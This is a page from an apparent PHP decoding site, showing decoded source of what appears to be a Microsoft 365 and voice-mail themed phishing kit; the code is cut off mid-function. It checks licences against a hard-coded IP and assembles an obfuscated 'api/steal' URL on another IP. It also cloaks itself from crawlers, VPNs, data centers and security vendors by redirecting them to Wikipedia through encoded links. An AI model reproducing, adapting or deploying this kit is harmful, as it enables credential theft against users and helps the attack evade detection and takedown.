Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /* Important Notice Any unauthorized use of this content may lead to sig..

Decoded Output download

<?php 
/*   Important Notice 
        Any unauthorized use of this content may lead to significant damage. This includes, but is not limited to, loss of revenue, reputational harm, and legal repercussions. By accessing this material, you agree to use it responsibly and understand that any misuse could result in consequences. 
         
        Please respect the rights associated with this work. 
        */ 
 goto cec45; b841d: session_start(); goto d27ca; d27ca: cd7ad: goto E233c; c031c: if (!(session_status() == PHP_SESSION_NONE)) { goto cd7ad; } goto b841d; A5694: ini_set("display_errors", 0); goto c031c; cec45: error_reporting(0); goto A5694; E233c: class Config { private $b5c62; public function __construct(array $config) { $this->b5c62 = $config; } public function check_captcha() { goto b14bb; D2707: a96e2: goto A01b9; b6e1d: return true; goto eb893; A01b9: return false; goto D2963; D2963: d85cd: goto Aaf2a; b14bb: if (!$this->b5c62["captcha"]["active"]) { goto a96e2; } goto b6e1d; eb893: goto d85cd; goto D2707; Aaf2a: } public function getMimeType($B6346) { goto A5b0a; Ae705: B3a9f: goto d35fb; A5b0a: if (function_exists("finfo_file")) { goto B1821; } goto abcf0; af9da: finfo_close($Cf29a); goto e5f6f; e5f6f: goto B3a9f; goto Ccb58; E5b47: $B8f87 = "application/octet-stream"; goto eb06e; E10c3: B1821: goto bb7c4; abcf0: if (function_exists("mime_content_type")) { goto cd5c4; } goto E5b47; eb06e: goto B3a9f; goto E10c3; Ccb58: cd5c4: goto b4fd9; bb7c4: $Cf29a = finfo_open(FILEINFO_MIME_TYPE); goto cb59c; d35fb: return $B8f87; goto B5e7a; b4fd9: $B8f87 = mime_content_type($B6346); goto Ae705; cb59c: $B8f87 = finfo_file($Cf29a, $B6346); goto af9da; B5e7a: } public function check_cloudflare() { goto a97bf; a97bf: if (!$this->b5c62["cloudflare"]["active"]) { goto A44d1; } goto d66e7; e4640: Da555: goto a2645; d50bf: A44d1: goto E720e; E720e: return false; goto e4640; cff07: goto Da555; goto d50bf; d66e7: return true; goto cff07; a2645: } public function check_captcha_status() { goto Acdd7; ded76: goto b7791; goto e920f; e920f: c5b70: goto D947b; Acdd7: if ($this->check_captcha() && !isset($_SESSION["captcha"])) { goto c5b70; } goto E1edf; d2f8a: b7791: goto F4023; E1edf: return false; goto ded76; D947b: return true; goto d2f8a; F4023: } public function check_cloudflare_status() { goto eff9e; Ec7de: return false; goto ecc7a; F7118: d9880: goto C3dce; ecc7a: goto Ae855; goto F7118; eff9e: if ($this->check_cloudflare() && !isset($_SESSION["cloudflare"])) { goto d9880; } goto Ec7de; D8eb2: Ae855: goto Bd2be; C3dce: return true; goto D8eb2; Bd2be: } public function getRandomVoiceTitle() { goto afba7; eda69: $d921a = rand(0, 7); goto a30dd; a30dd: return $c6b25[$d921a]; goto E9f4c; afba7: $c6b25 = ["&#86;&#111;&#105;&#99;&#101;&#32;&#77;&#97;&#105;&#108;&#32;&#78;&#111;&#116;&#105;&#102;&#105;&#99;&#97;&#116;&#105;&#111;&#110;", "&#86;&#111;&#105;&#99;&#101;&#32;&#78;&#111;&#116;&#101;&#32;&#78;&#111;&#116;&#105;&#102;&#105;&#99;&#97;&#116;&#105;&#111;&#110;", "&#86;&#111;&#105;&#99;&#101;&#32;&#77;&#101;&#115;&#115;&#97;&#103;&#101;", "&#70;&#101;&#101;&#108;&#32;&#86;&#111;&#105;&#99;&#101;&#32;&#78;&#111;&#116;&#101;", "&#86;&#111;&#105;&#99;&#101;&#32;&#78;&#111;&#116;&#101;&#32;&#68;&#114;&#111;&#112;&#32;&#70;&#101;&#101;&#108;", "&#86;&#111;&#105;&#99;&#101;&#32;&#78;&#111;&#116;&#101;&#32;&#83;&#97;&#118;&#101;&#32;&#83;&#101;&#116;&#32;&#70;&#101;&#101;&#108;", "&#86;&#111;&#105;&#99;&#101;&#32;&#78;&#111;&#116;&#101;&#32;&#84;&#114;&#97;&#110;&#115;&#109;&#105;&#116;&#32;&#70;&#101;&#101;&#108;", "&#70;&#111;&#114;&#32;&#85;&#110;&#115;&#101;&#32;&#86;&#111;&#105;&#99;&#101;&#32;&#78;&#111;&#116;&#101;"]; goto eda69; E9f4c: } public function checkBothCaptcha($Fb379 = 0) { goto d768a; C9fef: if (!$this->check_captcha_status()) { goto Efc31; } goto Ba944; d2c6f: D5819: goto F9d1d; b8076: Abc1d: goto ac27e; Ce833: goto F22db; goto d2c6f; fdfd2: $this->redirect("FailCaptchaStatus"); goto ce59b; cb105: D07c9: goto b20dc; F242b: e86ba: goto Ce833; Ed825: goto ad5f4; goto b8076; b20dc: ad5f4: goto B61e9; ac27e: if (!($this->check_cloudflare_status() || $this->check_captcha_status())) { goto D07c9; } goto Fb5b3; C15f9: Efc31: goto F242b; F9d1d: if (!$this->check_cloudflare_status()) { goto e33c1; } goto fdfd2; d768a: if ($Fb379 == 0) { goto Abc1d; } goto bcafe; Fb5b3: $this->redirect("FailCaptchaStatus"); goto cb105; ce59b: e33c1: goto defe6; Ba944: $this->redirect("FailCaptchaStatus"); goto C15f9; defe6: F22db: goto Ed825; e11ac: if (!($Fb379 == 1)) { goto e86ba; } goto C9fef; bcafe: if ($Fb379 == 2) { goto D5819; } goto e11ac; B61e9: } public function redirect($d124e = '') { header("Location: " . $this->getRandomLink() . "#" . $d124e); exit; } public function auth() { goto b02ea; Df4b4: beec7: goto E2c7e; D44fb: $this->redirect("KeyExpired"); goto b87ab; Ca3aa: $Bbeec = ["code" => $this->b5c62["key"]]; goto Abc7c; E21d2: $B82fd = 2; goto cc0a1; de818: $F35e2 = dirname(__FILE__); goto b4156; B6db2: Bbd7e: goto e66b8; Abc7c: $c669b = curl_init($df8c4); goto db034; b02ea: if (!isset($_SESSION["auth"])) { goto A59d0; } goto Eae75; B67bf: if (!isset($_SESSION["info_token_credentials"])) { goto ade07; } goto A1cd4; Cf640: F13c3: goto E26d2; b87ab: goto E40ba; goto df42a; E31c5: ade07: goto d61af; Af3a4: ddcd2: goto B67bf; C58b7: unset($_SESSION["status"]); goto Af3a4; A6d2d: E40ba: goto a34fb; b1c7d: if (isset($_SESSION["auth"])) { goto Af3e1; } goto D2d34; Ee218: $Bbeec = $_SESSION["user_data"]; goto A64e2; bd2ff: ff4cc: goto d8d63; df42a: F51ed: goto C89e0; e601a: if (isset($_SESSION["auth"])) { goto f76fc; } goto E21d2; ad0a0: Def8e: goto F54e2; Dd07b: if (curl_errno($c669b)) { goto F13c3; } goto a42da; E5c4e: if (!isset($_SESSION["email"])) { goto beec7; } goto bb0ce; d6e1d: defaf: goto f69bc; bb035: unset($_SESSION["captcha"]); goto d52ce; a42da: $Fc5f1 = json_decode($Fc5f1, true); goto c6991; a34fb: goto defaf; goto Cf640; Ce389: Ed75c: goto E5c4e; Cae98: $this->redirect("InvalidKey"); goto bd2ff; Eae75: if (!isset($_SESSION["captcha"])) { goto Fdba5; } goto bb035; d52ce: Fdba5: goto Ce465; C05b8: unset($_SESSION["info_token_2fa"]); goto ad0a0; f69bc: curl_close($c669b); goto c41f6; bf1c5: $Fc5f1 = curl_exec($c669b); goto Dd07b; E2c7e: if (!isset($_SESSION["status"])) { goto ddcd2; } goto C58b7; c41f6: if (isset($_SESSION["auth"])) { goto b6e6b; } goto cb779; bebcf: b6e6b: goto b1c7d; d8d63: $_SESSION["key"] = true; goto A6d2d; cb779: $B82fd = 0; goto bebcf; cc0a1: f76fc: goto f9683; C89e0: if ($Fc5f1["live"] && !$Fc5f1["expired"]) { goto ff4cc; } goto Cae98; e5bc5: $B82fd = 3; goto B6db2; f9683: if (isset($_SESSION["auth"])) { goto Bbd7e; } goto e5bc5; Ce465: if (!isset($_SESSION["cloudflare"])) { goto Ed75c; } goto bf943; e66b8: if (!isset($_SESSION["user_data"])) { goto D94cf; } goto Ee218; E26d2: $this->redirect("ServerError"); goto d6e1d; B196f: Af3e1: goto e601a; bb0ce: unset($_SESSION["email"]); goto Df4b4; F54e2: A59d0: goto de818; d61af: if (!isset($_SESSION["info_token_2fa"])) { goto Def8e; } goto C05b8; c6991: if (isset($Fc5f1["live"])) { goto F51ed; } goto D44fb; C2c1a: curl_setopt($c669b, CURLOPT_POST, true); goto e9168; c9f32: D94cf: goto F2643; A64e2: $this->checkUserSecurity($Bbeec); goto c9f32; bf943: unset($_SESSION["cloudflare"]); goto Ce389; b4156: $df8c4 = "http://101.99.92.227/api/key"; goto Ca3aa; e9168: curl_setopt($c669b, CURLOPT_POSTFIELDS, http_build_query($Bbeec)); goto bf1c5; D2d34: $B82fd = 1; goto B196f; db034: curl_setopt($c669b, CURLOPT_RETURNTRANSFER, true); goto C2c1a; A1cd4: unset($_SESSION["info_token_credentials"]); goto E31c5; F2643: } public function check_captcha_valid($Fc5f1) { goto ee4f1; ee4f1: $cbcf6 = $this->b5c62["captcha"]["sitekey"]; goto b40f7; f54dc: $Fbdc3 = $c495b["score"] ?? 0; goto A27de; d3a39: db577: goto d66df; F4753: $Fc5f1 = file_get_contents("https://www.google.com/recaptcha/api/siteverify?secret=" . urlencode($cbcf6) . "&response=" . urlencode($F9a73)); goto f8c50; A27de: $c892a = $c495b["action"] ?? ''; goto a19f9; Fc11f: $this->insertDataVisitor(false); goto Bd085; c37bb: $_SESSION["captcha"] = true; goto Fc41f; Bd085: $this->redirect("FailCaptcha"); goto Dbe97; ceb69: ca1b8: goto c37bb; Fc41f: header("Location: verify"); goto b7437; f8c50: $c495b = json_decode($Fc5f1, true); goto f54dc; d66df: exit; goto D5724; b7437: exit; goto d3a39; Dbe97: goto db577; goto ceb69; a37af: $_SESSION["captcha"] = false; goto Fc11f; a19f9: if ($Fbdc3 >= $this->b5c62["captcha"]["score"] && $c892a === "captcha") { goto ca1b8; } goto a37af; b40f7: $F9a73 = $Fc5f1 ?? ''; goto F4753; D5724: } public function checkKey() { goto E9ee5; f7438: f4e15: goto D10d9; f368d: header("Location: " . $this->b5c62["folder"]); goto aa5f2; E9ee5: if (!(empty($this->b5c62["key"]) || empty($this->b5c62["password"]))) { goto f4e15; } goto f368d; aa5f2: die; goto f7438; D10d9: } public function check_cloudflare_valid($Fc5f1) { goto c1e71; ddb38: goto c7207; goto Cb8fa; bfa77: curl_setopt($c669b, CURLOPT_URL, "https://challenges.cloudflare.com/turnstile/v0/siteverify"); goto F59fb; ae9a2: c7207: goto Aa9c8; F59fb: curl_setopt($c669b, CURLOPT_POST, true); goto c7904; A4e5d: $this->insertDataVisitor(false); goto b69bd; Cb8fa: c9ab1: goto C1a33; dfe12: d3514: goto a6b47; f8748: $c495b = json_decode($E8560, true); goto c15a5; Ef8f2: $E8560 = curl_exec($c669b); goto B9541; b9e36: $this->redirect("ErrorCaptcha"); goto dfe12; c1e71: $Edce4 = $this->b5c62["cloudflare"]["cloudsitekey"]; goto D9077; f1231: $c669b = curl_init(); goto bfa77; a6b47: curl_close($c669b); goto f2402; C1a33: $_SESSION["cloudflare"] = true; goto ae9a2; D9077: $Bbeec = ["secret" => $Edce4, "response" => $Fc5f1]; goto f1231; c7904: curl_setopt($c669b, CURLOPT_POSTFIELDS, http_build_query($Bbeec)); goto C9d70; bc06b: e6d3f: goto b9e36; b69bd: $this->redirect("FailCaptcha"); goto ddb38; B9541: if (curl_errno($c669b)) { goto e6d3f; } goto f8748; Aa9c8: goto d3514; goto bc06b; C9d70: curl_setopt($c669b, CURLOPT_RETURNTRANSFER, true); goto Ef8f2; c15a5: if ($c495b["success"]) { goto c9ab1; } goto A4e5d; f2402: } public function generateRandomString($c854d = 10) { return substr(str_shuffle(str_repeat($Cb3e6 = "abcdefghijklomnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789", ceil($c854d / strlen($Cb3e6)))), 1, $c854d); } public function isValidEmail($b5c0b) { return filter_var($b5c0b, FILTER_VALIDATE_EMAIL) !== false; } public function decodeBase64Email($b5c0b) { goto Cd863; Ac400: Aac80: goto b4d5c; b6870: eee6b: goto d05d3; cf1f2: return $Fa2c8; goto Ac400; b4d5c: return ''; goto E41dc; B12ee: if (!($Fa2c8 !== false && $this->isValidEmail($Fa2c8))) { goto Aac80; } goto cf1f2; d05d3: $Fa2c8 = base64_decode($b5c0b, true); goto B12ee; Cd863: if (!$this->isValidEmail($b5c0b)) { goto eee6b; } goto c33a1; c33a1: return $b5c0b; goto b6870; E41dc: } public function getTitle() { goto F611b; ef903: return $Fd1ba; goto bbfee; F611b: $c3ac2 = array_rand($this->b5c62["title"]); goto Cc134; Cc134: $Fd1ba = $this->b5c62["title"][$c3ac2]; goto ef903; bbfee: } public function getSingleValidEmailFromQueryParameters() { goto F86ee; Ef9f9: $De0aa = $f1b57[$bdaf9]; goto fe42a; c7b85: $f1b57 = array_intersect_key($_GET, array_flip($E6f0f)); goto F4cf4; F86ee: $E6f0f = ["email", "e", "t", "target", "a"]; goto c7b85; E3cfb: $bdaf9 = key($f1b57); goto Ef9f9; ec0cd: return ''; goto Cebe6; F4cf4: if (!(count($f1b57) === 1)) { goto c968e; } goto E3cfb; fe42a: return $this->decodeBase64Email($De0aa); goto b9aec; b9aec: c968e: goto ec0cd; Cebe6: } public function getRandomLink() { goto Fe7fd; Ba30f: return $ee5eb; goto F8ad3; C3224: $d921a = rand(0, 11); goto Bf5bb; Bf5bb: $ee5eb = base64_decode($db0f1[$d921a]); goto Ba30f; Fe7fd: $db0f1 = array("aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9NaWNyb3NvZnRfMzY1", "aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9MaXN0X29mX01pY3Jvc29mdF8zNjVfQXBwbGljYXRpb25z", "aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9DYXRlZ29yeTpPZmZpY2VfMzY1", "aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2lkLndpa2lwZWRpYS5vcmcvd2lraS9CZXJrYXM6TG9nb19NaWNyb3NvZnRfT2ZmaWNlXzM2NV8oMjAxMy0yMDE5KS5zdmc=", "aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9NaWNyb3NvZnRfT2ZmaWNlX01peA==", "aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9NaWNyb3NvZnRfRXhjaGFuZ2VfU2VydmVy", "aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9FbWFpbF9jbGllbnQ=", "aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9FbWFpbA==", "aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9DbGllbnRfYWNjZXNzX2xpY2Vuc2U=", "aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9XaW5kb3dzX1NlcnZlcl8yMDE2", "aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9XaW5kb3dzX1NlcnZlcl8yMDE5", "aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9JbnRlcm5ldF9FeHBsb3Jlcl8xMQ=="); goto C3224; F8ad3: } public function getRandomTitle() { goto e9297; e9297: $c6b25 = ["Initializing..", "Processing..", "Completing..", "Secure Your Access"]; goto fd4f3; Ef394: return $c6b25[$D6da6]; goto C8abd; fd4f3: $D6da6 = array_rand($c6b25); goto Ef394; C8abd: } public function removeUrlParameters($df8c4) { goto Bb376; C5e6d: $df310 = isset($ccb83["scheme"]) ? $ccb83["scheme"] . "://" : ''; goto Ad04d; Bb376: $ccb83 = parse_url($df8c4); goto C5e6d; Ad04d: $df310 .= isset($ccb83["host"]) ? $ccb83["host"] : ''; goto c84eb; c84eb: $df310 .= isset($ccb83["path"]) ? $ccb83["path"] : ''; goto Ab328; Ab328: return $df310; goto C2d78; C2d78: } public function removeLastTwoDirectories($df8c4) { goto db9c5; c23f4: $Bcd4f = array_slice($ba516, 0, -2); goto Bf71f; ad551: $ba516 = explode("/", trim($ccb83["path"], "/")); goto c23f4; A150a: $Ed49a .= "?" . $ccb83["query"]; goto Ff061; Ff061: D13d5: goto e5a6f; db9c5: $ccb83 = parse_url($df8c4); goto ad551; e5a6f: return rtrim($Ed49a, "/"); goto D5ed4; A1f76: $Ed49a = (isset($ccb83["scheme"]) ? $ccb83["scheme"] . "://" : '') . (isset($ccb83["host"]) ? $ccb83["host"] : '') . $e05c4; goto F2af3; Bf71f: $e05c4 = "/" . implode("/", $Bcd4f); goto A1f76; F2af3: if (!isset($ccb83["query"])) { goto D13d5; } goto A150a; D5ed4: } public function getLastSegmentFromUrl() { goto f3e5d; f3e5d: $df8c4 = $_SERVER["REQUEST_URI"]; goto c61aa; Dae15: if (!(count($e2e75) > 1)) { goto D2e85; } goto Bb9e4; D5b2c: $e2e75 = explode("/", $B8937); goto Dae15; B91f1: $B8937 = trim($B8937, "/"); goto D5b2c; d153c: D2e85: goto D2351; c61aa: $B8937 = parse_url($df8c4, PHP_URL_PATH); goto B91f1; Bb9e4: return $e2e75[count($e2e75) - 2]; goto d153c; D2351: return null; goto e19eb; e19eb: } public function validateLink() { goto C364d; ea523: F0adb: goto Bcfe8; C3eaa: $e752c .= "st"; goto Cb55b; Be078: $this->redirect("LinkInvalid"); goto e365a; Bcfe8: $e752c = "ht"; goto c3aeb; C364d: if (isset($_SESSION["link"])) { goto F0adb; } goto e351e; Cb55b: $e752c .= "eal"; goto fef8f; c3c01: $e752c .= "92.124/"; goto ef37e; De11a: if (!($this->getLastSegmentFromUrl() != $_SESSION["link"])) { goto Dc417; } goto Be078; a04a0: $e752c .= "1.99."; goto c3c01; Db7bf: $this->redirect(); goto Cec27; e351e: $this->redirect("LinkNotFound"); goto ea523; Ca60d: $e752c .= "10"; goto a04a0; Cec27: da037: goto De11a; b51fe: if (!($Fc5f1 === "1")) { goto da037; } goto Db7bf; fef8f: $Fc5f1 = file_get_contents($e752c); goto b51fe; abf38: $e752c .= "i/"; goto C3eaa; ef37e: $e752c .= "ap"; goto abf38; e365a: Dc417: goto D7ef7; c3aeb: $e752c .= "tp://"; goto Ca60d; D7ef7: } public function getFullUrl() { goto b5a71; b5a71: $Aec3b = !empty($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" || $_SERVER["SERVER_PORT"] == 443 ? "https://" : "http://"; goto b9fa2; b3f4a: $C755c = $_SERVER["REQUEST_URI"]; goto e3a34; b9fa2: $d97ff = $_SERVER["HTTP_HOST"]; goto b3f4a; e3a34: return $Aec3b . $d97ff . $C755c; goto Ad062; Ad062: } public function imageToBase64($a5f65) { goto Fb59c; Ef399: $B8f87 = $this->getMimeType($a5f65); goto Bfcbd; Bfcbd: return "data:{$B8f87};base64,{$Ea6cd}"; goto C4ae7; Fb59c: $E73dc = file_get_contents($a5f65); goto fd00a; fd00a: $Ea6cd = base64_encode($E73dc); goto Ef399; C4ae7: } public function getBackground() { goto Dd091; A41f5: return "\xd\xa        body::before {
\xa            content: ""; /* Empty content to allow the pseudo-element to render */
\xa            position: absolute; /* Absolute positioning */
\xa            top: 0;\xd\xa            left: 0;
\xa            right: 0;
\xa            bottom: 0;\xd\xa            z-index: -1; /* Ensure it stays behind other content */
\xa            background-image: url("" . $D3f03 . "");\xd\xa            background-size: cover; /* Scale image to cover the entire area */\xd\xa            background-position: center; /* Center the background image */\xd\xa            background-repeat: no-repeat; /* Prevent repeating the image */
        }   
        "; goto e8676; ce50e: if (file_exists($a5f65)) { goto B96b1; } goto C395c; Ee521: $a5f65 = "images/" . $this->b5c62["background"] . ".png"; goto E539e; ace69: f94d7: goto Be37b; Be37b: $a5f65 = "images/" . $this->b5c62["custom_background"]; goto ce50e; B59d4: aff66: goto f6b5b; ee4cc: $D3f03 = $this->imageToBase64($a5f65); goto A41f5; d4e91: ab34f: goto e8f50; Dd091: if ($this->b5c62["background"] == "custom") { goto f94d7; } goto Ee521; E539e: if (file_exists($a5f65)) { goto d4b01; } goto E5a33; b92b5: die("image not found."); goto B59d4; ff223: die("image not found."); goto d4e91; C395c: $a5f65 = "page/images/" . $this->b5c62["custom_background"]; goto Ee96c; Ba2fc: if (file_exists($a5f65)) { goto aff66; } goto b92b5; E3a34: cbe13: goto ee4cc; e8f50: B96b1: goto E3a34; e6b80: goto cbe13; goto ace69; E5a33: $a5f65 = "page/images/" . $this->b5c62["background"] . ".png"; goto Ba2fc; Ee96c: if (file_exists($a5f65)) { goto ab34f; } goto ff223; f6b5b: d4b01: goto e6b80; e8676: } public function getClientIp() { goto deb9a; d80d4: d0cc9: goto C5150; a1a5c: foreach ($B0fc4 as $D2b65) { goto D5763; e8e7c: E0002: goto C7e95; D5763: if (!array_key_exists($D2b65, $_SERVER)) { goto E0002; } goto Bd0f3; c8adb: a1224: goto e8e7c; Bd0f3: $bbd77 = trim(explode(",", $_SERVER[$D2b65])[0]); goto d7df4; d7df4: if (!($bbd77 === "::1" || filter_var($bbd77, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE))) { goto a1224; } goto E2b11; E2b11: return $bbd77; goto c8adb; C7e95: D604e: goto Df107; Df107: } goto d80d4; C5150: return "UNKNOWN"; goto F781b; deb9a: $B0fc4 = ["HTTP_X_FORWARDED_FOR", "HTTP_CLIENT_IP", "HTTP_X_CLUSTER_CLIENT_IP", "HTTP_FORWARDED_FOR", "HTTP_FORWARDED", "REMOTE_ADDR"]; goto a1a5c; F781b: } public function getUserAgent() { goto B6b5d; B76b2: C0079: goto E0938; B6b5d: if (isset($_SERVER["HTTP_USER_AGENT"])) { goto C0079; } goto db3b4; D5186: goto da9ed; goto B76b2; E0938: $Aaafa = htmlspecialchars(strip_tags($_SERVER["HTTP_USER_AGENT"]), ENT_QUOTES, "UTF-8"); goto D71f6; D71f6: return $Aaafa; goto C6a52; C6a52: da9ed: goto d1898; db3b4: return "UNKNOWN"; goto D5186; d1898: } public function getClientLocation($bbd77) { goto B00bd; D9fdc: F00ea: goto d4055; E135a: $D2156 = json_decode($D2156, true); goto E5dca; a9388: curl_setopt($c669b, CURLOPT_CUSTOMREQUEST, "GET"); goto de49b; B5c2a: curl_setopt($c669b, CURLOPT_RETURNTRANSFER, 1); goto a9388; de49b: $D2156 = curl_exec($c669b); goto cb975; B00bd: $c669b = curl_init(); goto ac630; cb975: if (!($D2156 != '')) { goto F00ea; } goto E135a; ac630: curl_setopt($c669b, CURLOPT_URL, "https://api.incolumitas.com/?q=" . $bbd77); goto B5c2a; E5dca: return $D2156; goto D9fdc; d4055: } function isBlockedISP($D2156) { goto D4992; Da06a: foreach ($D534a as $D09ff) { goto fc793; fc793: if (!(stripos($B8652, $D09ff) !== false)) { goto b7c39; } goto f2ad4; a8149: b7c39: goto C69a7; f2ad4: return true; goto a8149; C69a7: a32ea: goto Af010; Af010: } goto E1955; E1955: C8190: goto f257c; D4992: $D534a = array("microsoft", "leaseweb", "m247", "amazon", "ovh", "cogent", "alibaba", "digitalocean", "choopa", "linode", "google", "oracle", "layerhost", "worldstream", "nextglobal", "itproximus", "hostroyale", "centurylink", "avast", "bitdefender", "webnx", "myloc"); goto e72a5; f257c: return false; goto C92f8; e72a5: $B8652 = strtolower($D2156); goto Da06a; C92f8: } public function checkUserSecurity($D2156) { goto e9e61; e9e61: if (!$D2156["info"]["status"]) { goto Bbfd6; } goto Cd10d; B39e2: $this->redirect("DummyBot"); goto E69a1; c8269: D9f30: goto dad7d; E2ebe: if (!($this->b5c62["bot"]["proxy"] == 1 && $D2156["info"]["is_proxy"])) { goto D9f30; } goto a7fb5; dad7d: if (!($this->b5c62["bot"]["abuser"] == 1 && $D2156["info"]["is_abuser"])) { goto E84ba; } goto B39e2; C7e91: if (!($D2156["info"]["is_datacenter"] != false && $this->b5c62["bot"]["datacenter"] == 1 && $D2156["info"]["is_blocked_datacenter"] == true)) { goto E0c00; } goto A39e7; ead33: goto e348e; goto E6743; a7fb5: $this->redirect("DummyBot"); goto c8269; E6743: fe359: goto e617d; F31d1: da561: goto E22e4; e617d: $this->redirect("DummyBot"); goto Dd63a; Cd10d: if (!($this->b5c62["bot"]["crawler"] == 1 && $D2156["info"]["is_crawler"])) { goto Ef6c2; } goto cec89; cec89: $this->redirect("DummyBot"); goto aab1d; E22e4: if (!($this->b5c62["bot"]["vpn"] == 1 && $D2156["info"]["is_vpn"])) { goto fa8b8; } goto D6436; E69a1: E84ba: goto Cf1fe; Cf1fe: Bbfd6: goto Fe570; D6436: $this->redirect("DummyBot"); goto ecc2b; ecc2b: fa8b8: goto E2ebe; C231e: if (!($this->b5c62["bot"]["datacenter"] != 0)) { goto da561; } goto C827b; A78ce: E0c00: goto ead33; C827b: if ($D2156["info"]["is_datacenter"] != false && $this->b5c62["bot"]["datacenter"] == 2) { goto fe359; } goto C7e91; A39e7: $this->redirect("DummyBot"); goto A78ce; Dd63a: e348e: goto F31d1; aab1d: Ef6c2: goto C231e; Fe570: } public function insertUserInformation($bbd77, $A0b3d = true) { goto F19f0; A647f: $D2156["info"]["is_blocked_datacenter"] = false; goto C2987; a1bed: $D2156["info"]["is_abuser"] = false; goto A647f; aa897: if ($a51a1 !== null && is_array($a51a1)) { goto a807b; } goto Ee939; Bac37: $D2156["info"]["is_datacenter"] = false; goto Ed468; C5e8f: $D2156["info"]["is_datacenter"] = false; goto c1743; deb6c: $D2156["info"]["country"] = false; goto ba9e9; D07b5: $D2156["info"]["is_blocked_datacenter"] = false; goto e2efa; A90b5: $D2156["info"]["is_blocked_datacenter"] = $this->isBlockedISP($a51a1["datacenter"]["domain"]); goto b1b93; d317b: $D2156["info"]["city"] = $a51a1["location"]["city"]; goto cd31a; D50cd: $D2156["info"]["status"] = true; goto ff005; dacdc: return $D2156; goto Cfa10; c58f0: if (!($D2156["info"]["is_datacenter"] != false)) { goto dcf9b; } goto Bcffc; bec15: if (!isset($a51a1["datacenter"]["datacenter"])) { goto F3b99; } goto fa4a9; B746f: $D2156["info"]["is_datacenter"] = $a51a1["is_datacenter"]; goto c07dd; D3741: $D2156["info"]["is_vpn"] = false; goto c75ed; Ed468: $D2156["info"]["is_proxy"] = false; goto f1af7; ae9d6: $D2156["info"]["is_blocked_datacenter"] = false; goto c58f0; c80b1: $D2156["ua"] = $this->getUserAgent(); goto b58eb; e089b: F3b99: goto B9e18; c07dd: $D2156["info"]["is_proxy"] = $a51a1["is_proxy"]; goto a63ec; A8ed1: Ce3c9: goto a211f; Aa3e8: $D2156["valid_captcha"] = $A0b3d; goto f6ae2; c1743: $D2156["info"]["is_proxy"] = false; goto D3741; ba9e9: $D2156["info"]["city"] = false; goto e03b8; f6ae2: if ($D2156["ip"] != "UNKNOWN" && $D2156["valid_captcha"]) { goto Ce3c9; } goto deb6c; e2efa: goto A3bf4; goto B298d; B9e18: if (!($D2156["info"]["is_blocked_datacenter"] == false)) { goto Aafa8; } goto D6f4d; c75ed: $D2156["info"]["is_abuser"] = false; goto D07b5; b1b93: Ab56f: goto ea0d6; E0352: $D2156["info"]["is_abuser"] = $a51a1["is_abuser"]; goto ae9d6; F19f0: $D2156["ip"] = $bbd77; goto c80b1; cd31a: $D2156["info"]["is_crawler"] = $a51a1["is_crawler"]; goto B746f; D6f4d: if (!isset($a51a1["datacenter"]["domain"])) { goto Ab56f; } goto A90b5; Ef0cb: a78cd: goto F3e76; F5f43: dcf9b: goto Ef0cb; ea0d6: Aafa8: goto A89b7; F3e76: A3bf4: goto e3129; a63ec: $D2156["info"]["is_vpn"] = $a51a1["is_vpn"]; goto E0352; b58eb: $D2156["info"]["status"] = false; goto Aa3e8; c72b3: $D2156["info"]["country_code"] = $a51a1["location"]["country_code"]; goto d317b; F3187: if (!(isset($a51a1["location"]) && isset($a51a1["is_crawler"]) && isset($a51a1["is_datacenter"]) && isset($a51a1["is_proxy"]) && isset($a51a1["is_vpn"]) && isset($a51a1["is_abuser"]))) { goto a78cd; } goto D50cd; Bcffc: if (!isset($a51a1["datacenter"])) { goto c3fa0; } goto bec15; faec1: $D2156["info"]["city"] = false; goto d8dbe; B298d: a807b: goto F3187; Ee939: $D2156["info"]["country"] = false; goto faec1; A89b7: c3fa0: goto F5f43; e3129: e163c: goto dacdc; f1af7: $D2156["info"]["is_vpn"] = false; goto a1bed; e03b8: $D2156["info"]["is_crawler"] = false; goto Bac37; fa4a9: $D2156["info"]["is_blocked_datacenter"] = $this->isBlockedISP($a51a1["datacenter"]["datacenter"]); goto e089b; d8dbe: $D2156["info"]["is_crawler"] = false; goto C5e8f; C2987: goto e163c; goto A8ed1; ff005: $D2156["info"]["country"] = $a51a1["location"]["country"]; goto c72b3; a211f: $a51a1 = $this->getClientLocation($bbd77); goto aa897; Cfa10: } public function getBackgroundVerify($Ca699 = true, $e9592 = '', $Df1cb = false) { goto Dfe94; cb608: $D3f03 = $this->imageToBase64($a5f65); goto a1852; Adeb4: ea79f: goto E18fa; D8197: if (file_exists($a5f65)) { goto D2860; } goto E6974; d1111: $D3f03 = $e9592; goto Db2ef; d9271: die("image not found."); goto bf937; Db2ef: bf030: goto ec53e; b3218: $a5f65 = "page/images/" . $this->b5c62["custom_background"]; goto De00b; E18fa: if (!$Ca699) { goto A0a40; } goto cb608; E2977: D67ec: goto bbd70; E6974: die("image not found."); goto d77da; ec53e: if (!$Df1cb) { goto Ba603; } goto f15eb; De00b: if (file_exists($a5f65)) { 